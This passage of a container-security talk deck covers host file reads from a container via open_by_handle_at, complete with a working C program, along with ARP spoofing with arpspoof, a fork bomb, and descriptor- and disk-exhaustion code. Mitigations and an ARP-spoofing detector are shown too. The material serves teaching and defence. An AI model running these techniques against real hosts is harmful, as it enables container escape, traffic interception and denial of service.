1 packets transmitted, 1 received, 0% packet loss, time 0ms

Slide 111

Slide 111 text

Try capabilities
root@sample1:/# mount /dev/sda1 /mnt/
root@sample1:/# cat /mnt/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
…
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false

Slide 112

Slide 112 text

DROP capabilities
$ cat sample3.haco
…
config.capabilities.allow :all
config.capabilities.drop "cap_sys_admin"
config.capabilities.drop "cap_net_raw"
…

Slide 113

Slide 113 text

Without the privilege the operation fails
$ haconiwa start sample3.haco
root@sample1:/# ping 8.8.8.8
ping: icmp open socket: Operation not permitted
root@sample1:/# mount /dev/sda1 /mnt/
mount: permission denied

Slide 114

Slide 114 text

syscall             what it allows
kexec_load          loading a new kernel
init_module         loading a kernel module
finit_module        loading a kernel module
delete_module       removing a kernel module
open_by_handle_at   opening the file a handle refers to

Slide 115

Slide 115 text

open_by_handle_at
• A system call that opens the file a file handle refers to
• Requires CAP_DAC_READ_SEARCH
• Bypasses read permission checks on files and directories
• Gives access to any file on the same filesystem as a bind-mounted directory

Slide 116

Slide 116 text

open_by_handle_at
int open_by_handle_at(int mount_fd, struct file_handle *handle, int flags);

struct file_handle {
    unsigned int  handle_bytes;   /* Size of f_handle [in, out] */
    int           handle_type;    /* Handle type [out] */
    unsigned char f_handle[0];    /* File identifier */
};

Slide 117

Slide 117 text

open_by_handle_at
struct file_handle {
    unsigned int  handle_bytes;   /* Size of f_handle [in, out] */
    int           handle_type;    /* Handle type [out] */
    unsigned char f_handle[0];    /* File identifier */
};
The first bytes of f_handle hold the inode number of the file to open (little-endian).

Slide 118

Slide 118 text

open_by_handle_at
$ stat /etc/passwd
  File: '/etc/passwd'
  Size: 1724  Blocks: 8  IO Block: 4096  regular file
Device: 801h/2049d  Inode: 23125  Links: 1

struct my_file_handle h = {
    .handle_bytes = 8,
    .handle_type = 1,
    // 23125 = 0x5a55, stored little-endian
    .f_handle = {0x55, 0x5a, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
};

Slide 119

Slide 119 text

open_by_handle_at
$ stat /etc/passwd
  File: '/etc/passwd'
  Size: 1724  Blocks: 8  IO Block: 4096  regular file
Device: 801h/2049d  Inode: 57824  Links: 1
$ haconiwa start sample4.haco
root@sample1:/# vim read_passwd.c
    // Change to the host's inode, e.g. 57824 = 0xe1e0:
    .f_handle = {0xe0, 0xe1, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00}
};

Slide 120

Slide 120 text

open_by_handle_at
root@sample1:/# gcc read_passwd.c
root@sample1:/# ./a.out
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
…
vagrant:x:1000:1000:,,,:/home/vagrant:/bin/bash
ubuntu:x:1001:1001:Ubuntu:/home/ubuntu:/bin/bash
lxc-dnsmasq:x:112:117:LXC dnsmasq,,,:/var/lib/lxc:/bin/false
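A version of the read_passwd.c exercise from slides 115 to 120 with the handle construction spelled out, added here as an example; read_passwd.c itself is not on the slides. It assumes an ext4 filesystem, whose handles are of type FILEID_INO32_GEN: a 32-bit inode number followed by a 32-bit inode generation, both little-endian, which is why inode 23125 became the bytes 55 5a. ext4 treats a generation of 0 as "do not check", so only the inode number needs to be known, exactly as the slides do it. The mount_fd may be any descriptor open on the same filesystem, for example a file bind-mounted into the container from the host.

```c
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>

/* ext4 handle type: 32-bit inode number, then 32-bit generation, little-endian. */
#define FILEID_INO32_GEN        1
#define INO32_GEN_HANDLE_BYTES  8

/* Same layout as struct file_handle, with f_handle sized for ext4. */
struct ino32_file_handle {
    unsigned int  handle_bytes;
    int           handle_type;
    unsigned char f_handle[INO32_GEN_HANDLE_BYTES];
};

/* Fill f_handle from an inode number and generation. A generation of 0 makes
 * ext4 skip the generation check, so guessing only the inode is enough. */
void encode_ino32_handle(uint32_t ino, uint32_t gen, unsigned char out[INO32_GEN_HANDLE_BYTES])
{
    for (int i = 0; i < 4; i++) {
        out[i]     = (unsigned char)(ino >> (8 * i));
        out[4 + i] = (unsigned char)(gen >> (8 * i));
    }
}

uint32_t decode_ino32_handle(const unsigned char in[INO32_GEN_HANDLE_BYTES])
{
    uint32_t ino = 0;
    for (int i = 0; i < 4; i++) ino |= (uint32_t)in[i] << (8 * i);
    return ino;
}

/* Helpers for checking the encoding against the stat output on slides 118 and 119. */
int handle_byte(uint32_t ino, int idx)
{
    unsigned char h[INO32_GEN_HANDLE_BYTES];
    encode_ino32_handle(ino, 0, h);
    return h[idx];
}
int handle_roundtrip_ok(uint32_t ino, uint32_t gen)
{
    unsigned char h[INO32_GEN_HANDLE_BYTES];
    encode_ino32_handle(ino, gen, h);
    return decode_ino32_handle(h) == ino;
}

/* Open inode <ino> on the filesystem behind mount_fd, bypassing path lookup and
 * directory permission checks. Needs CAP_DAC_READ_SEARCH: without it the call
 * fails with EPERM, which is the whole point of dropping that capability. */
int open_inode_by_handle(int mount_fd, uint32_t ino, uint32_t gen, int flags)
{
    struct ino32_file_handle h = { INO32_GEN_HANDLE_BYTES, FILEID_INO32_GEN, {0} };
    encode_ino32_handle(ino, gen, h.f_handle);
    return open_by_handle_at(mount_fd, (struct file_handle *)&h, flags);
}

int main(int argc, char **argv)
{
    if (argc != 3) {
        fprintf(stderr, "usage: %s <file on the host filesystem, e.g. a bind mount> <inode>\n", argv[0]);
        return 2;
    }
    int mount_fd = open(argv[1], O_RDONLY);        /* any fd on the target filesystem */
    if (mount_fd < 0) { perror("open mount_fd"); return 1; }
    int fd = open_inode_by_handle(mount_fd, (uint32_t)strtoul(argv[2], NULL, 10), 0, O_RDONLY);
    if (fd < 0) { perror("open_by_handle_at"); return 1; }  /* EPERM: capability missing */
    char buf[4096];
    ssize_t n;
    while ((n = read(fd, buf, sizeof buf)) > 0) fwrite(buf, 1, (size_t)n, stdout);
    return 0;
}
```

Run as `./a.out /etc/resolv.conf 57824` inside a container where /etc/resolv.conf is bind-mounted from the host's root filesystem and 57824 is the host's inode for /etc/passwd (taken from `stat` on the host, as on slide 119). With CAP_DAC_READ_SEARCH dropped the same command prints "Operation not permitted", which is the capability layer of the Swiss cheese model doing its job even though the syscall itself was allowed.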

Slide 121

Slide 121 text

Getting a shell on the host
$ sudo haconiwa start demo1.haco
root@sample1:/# gcc breakout.c
root@sample1:/# ./a.out

Slide 122

Slide 122 text

Swiss cheese model
• Some of the security mechanisms containers use overlap in function
• e.g. a given system call may be blocked by both capabilities and seccomp
• If one mechanism is bypassed, another still blocks or mitigates the attack
• Even if seccomp is bypassed, capabilities still stop it

Slide 123

Slide 123 text

Container networking

Slide 124

Slide 124 text

Container Network
• In its default configuration LXD creates a bridge
(Diagram) Two containers, each with eth0 paired to a veth0 on the bridge lxdbr0, which connects to the host's eth0

Slide 125

Slide 125 text

Bridge Network
$ ip addr show dev lxdbr0
4: lxdbr0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default qlen 1000
    link/ether fe:20:6c:0f:5b:66 brd ff:ff:ff:ff:ff:ff
    inet 10.152.207.1/24 scope global lxdbr0
       valid_lft forever preferred_lft forever
    inet6 fd2e:8281:6de5:9841::1/64 scope global
       valid_lft forever preferred_lft forever
    inet6 fe80::281a:c0ff:fed1:4b28/64 scope link
       valid_lft forever preferred_lft forever

Slide 126

Slide 126 text

Container Network
• When you host containers, they receive traffic from the Internet
• What if a user inside a container could intercept that traffic…?
(Hex dump of a captured packet) 4500 0088 7f79 4000 4006 7980 0a6b 9601 0a6b 969f 8ef6 3039 53dd 5b1c 8615 bd1a 8018 00e5 41f1 0000

Slide 127

Slide 127 text

ARP Spoofing
• Changes how traffic is routed by exploiting the way ARP works
• ARP relies on hosts trusting their ARP table (the address mapping)
• Forged replies poison the table with wrong entries
(Same packet dump as Slide 126)

Slide 128

Slide 128 text

ARP Table
vagrant@ubuntu-xenial:~$ lxc list
attacker | RUNNING | 10.128.193.110 (eth0)
victim   | RUNNING | 10.128.193.231 (eth0)
vagrant@ubuntu-xenial:~$ arp -a
? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0   # victim
? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0   # attacker
? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3

Slide 129

Slide 129 text

Confirm that the containers can reach each other
vagrant@ubuntu-xenial:~$ lxc exec attacker bash
root@test1:~# ping 10.128.193.231   # victim's IP
PING 10.128.193.231 (10.128.193.231) 56(84) bytes of data.
64 bytes from 10.128.193.231: icmp_seq=1 ttl=64 time=0.070 ms
^C
--- 10.128.193.231 ping statistics ---
1 packets transmitted, 1 received, 0% packet loss, time 0ms
rtt min/avg/max/mdev = 0.070/0.070/0.070/0.000 ms

Slide 130

Slide 130 text

ARP Spoofing
root@test1:~# arpspoof -t 10.128.193.231 10.128.193.1 &> /dev/null &   # tell the victim that we are the gateway
[1] 1619
root@test1:~# arpspoof -t 10.128.193.1 10.128.193.231 &> /dev/null &   # tell the gateway (host) that we are the victim
[2] 1620

Slide 131

Slide 131 text

ARP Table (after spoofing: both container IPs now resolve to the attacker's MAC)
vagrant@ubuntu-xenial:~$ arp -a
? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0
? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3
? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0
? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3
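A detection check for the condition slide 131 shows, added here as an example and not taken from the slides: two IP addresses on the same bridge resolving to one MAC address. The two ARP tables embedded below are the host's `arp -a` output from slides 128 and 131, before and after arpspoof, used as constructed input; main additionally reads a live `arp -a` from standard input.

```c
#define _GNU_SOURCE
#include <stdio.h>
#include <string.h>
#include <strings.h>

/* One `arp -a` entry: "? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0" */
struct arp_entry { char ip[40]; char mac[18]; char dev[16]; };

/* Constructed input: the host's ARP table from slide 128, before arpspoof ... */
const char ARP_BEFORE[] =
    "? (10.128.193.231) at 00:16:3e:6a:55:5d [ether] on lxdbr0\n"
    "? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3\n"
    "? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n"
    "? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3\n";
/* ... and from slide 131, after the two arpspoof processes were started. */
const char ARP_AFTER[] =
    "? (10.128.193.231) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n"
    "? (10.0.2.2) at 52:54:00:12:35:02 [ether] on enp0s3\n"
    "? (10.128.193.110) at 00:16:3e:1d:73:72 [ether] on lxdbr0\n"
    "? (10.0.2.3) at 52:54:00:12:35:03 [ether] on enp0s3\n";

/* Parse one line; returns 1 for a complete entry, 0 otherwise
 * (lines such as "at <incomplete>" do not match and are skipped). */
int parse_arp_line(const char *line, struct arp_entry *e)
{
    return sscanf(line, "%*s (%39[^)]) at %17s [ether] on %15s", e->ip, e->mac, e->dev) == 3;
}

/* Count pairs of entries on the same interface that share a MAC address.
 * On a bridge, two IPs claiming one MAC is the signature arpspoof leaves behind. */
int count_mac_collisions(const char *arp_output)
{
    struct arp_entry entries[64];
    char copy[4096], *save, *line;
    int n = 0, collisions = 0;
    strncpy(copy, arp_output, sizeof copy - 1);      /* tables beyond 4 KiB are truncated */
    copy[sizeof copy - 1] = '\0';
    for (line = strtok_r(copy, "\n", &save); line && n < 64; line = strtok_r(NULL, "\n", &save))
        if (parse_arp_line(line, &entries[n])) n++;
    for (int i = 0; i < n; i++)
        for (int j = i + 1; j < n; j++)
            if (strcmp(entries[i].dev, entries[j].dev) == 0 &&
                strcasecmp(entries[i].mac, entries[j].mac) == 0) {
                printf("%s and %s both claim %s on %s\n",
                       entries[i].ip, entries[j].ip, entries[i].mac, entries[i].dev);
                collisions++;
            }
    return collisions;
}

int main(void)
{
    char buf[4096];
    size_t n = fread(buf, 1, sizeof buf - 1, stdin);  /* usage: arp -a | ./a.out */
    buf[n] = '\0';
    int c = count_mac_collisions(buf);
    printf("%d MAC collision(s)\n", c);
    return c ? 1 : 0;
}
```

Run from the host as `arp -a | ./a.out`; the exit status is non-zero when a collision is found, so it can sit in a cron job or a monitoring check. It only sees what the host's own ARP cache has learned, so the victim-side poisoning (the gateway entry inside the victim container) needs the same check run inside the container.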

Slide 132

Slide 132 text

Capture packets
root@attacker:~# tcpdump -i any -vv -w test.pcap
vagrant@ubuntu-xenial:~/shared$ curl 10.128.193.231

Slide 133

Slide 133 text

Look at the captured packets
$ lxc file pull attacker/root/test.pcap ./
$ tcpdump -X tcp port 80 -r test.pcap
0x0000: 4500 0082 2126 4000 3f06 8267 0a80 c101  E...!&@.?..g....
0x0010: 0a80 c1e7 8f28 0050 ebdb f6f0 89c2 03be  .....(.P........
0x0020: 8018 00e5 985d 0000 0101 080a 001b d7cb  .....]..........
0x0030: 001b d7cb 4745 5420 2f20 4854 5450 2f31  ....GET./.HTTP/1
0x0040: 2e31 0d0a 486f 7374 3a20 3130 2e31 3238  .1..Host:.10.128
0x0050: 2e31 3933 2e32 3331 0d0a 5573 6572 2d41  .193.231..User-A
0x0060: 6765 6e74 3a20 6375 726c 2f37 2e34 372e  gent:.curl/7.47.
0x0070: 300d 0a41 6363 6570 743a 202a 2f2a 0d0a  0..Accept:.*/*..
0x0080: 0d0a                                     ..

Slide 134

Slide 134 text

Other attack surfaces

Slide 135

Slide 135 text

Reading and clearing the dmesg buffer
root@sample1:/# dmesg
[  311.470895] EXT4-fs (sda1): error count since last fsck: 28
[  311.470928] EXT4-fs (sda1): initial error at time 1537860516: htree_dirblock_to_tree:986: inode 542086: block 1069691
[  311.470944] EXT4-fs (sda1): last error at time 1537928843: htree_dirblock_to_tree:986: inode 278756: block 531449
…
root@06399a7a8814:/# dmesg -C   # clears the host's kernel log buffer from inside the container
root@06399a7a8814:/# dmesg

Slide 136

Slide 136 text

Mass-creating negative dentries
root@sample1:/# perl -e 'stat("/$_") for 1..100000000'
vagrant@ubuntu-xenial:~$ sudo slabtop
 Active / Total Objects (% used)    : 4172542 / 4182249 (99.8%)
 Active / Total Slabs (% used)      : 197606 / 197606 (100.0%)
 Active / Total Caches (% used)     : 78 / 122 (63.9%)
 Active / Total Size (% used)       : 790487.34K / 794654.96K (99.5%)
 Minimum / Average / Maximum Object : 0.01K / 0.19K / 8.00K
  OBJS   ACTIVE  USE OBJ SIZE  SLABS OBJ/SLAB CACHE SIZE NAME
4050564 4050564 100%    0.19K 192884       21    771536K dentry

Slide 137

Slide 137 text

Mass-creating file descriptors
• There is an upper limit on the number of open file descriptors; it is shown in /proc/sys/fs/file-max
• If a process inside the container opens that many descriptors, and the uid is shared, the host side is affected too

#include <fcntl.h>
#include <stdio.h>

int main(void)
{
    char buf[32];
    int i;
    for (i = 0; i < 99198; i++) {          /* open, and keep open, as many files as allowed */
        sprintf(buf, "/tmp/%d", i);
        int fd = open(buf, O_CREAT, 0600);
        if (fd == -1) { printf("max fd %d\n", i); break; }
    }
    for (;;);                              /* hold the descriptors open */
}

Slide 138

Slide 138 text

Fork bomb
$ :(){ :|: & };:
$ for i in {1..9999}; do sleep infinity & done

Slide 139

Slide 139 text

Disk space
$ fallocate -l 20g big_file
• If the container has no disk quota, creating large files squeezes the host's disk space.
$ dd if=/dev/zero of=tempfile bs=20GB count=10

Slide 140

Slide 140 text

Summary (photo: flic.kr)

Slide 141

Slide 141 text

Summary
• Linux containers are protected by several security mechanisms
• Swiss cheese model (ex. if seccomp falls, capabilities remain)
• A misconfiguration lets a container affect the host or other containers
• LXC, Docker and the like ship default settings that block these attacks
• There may still be gaps, though
• CVE

Slide 142

Slide 142 text

Want to work at Pepabo too? Check the latest openings → @pb_recruit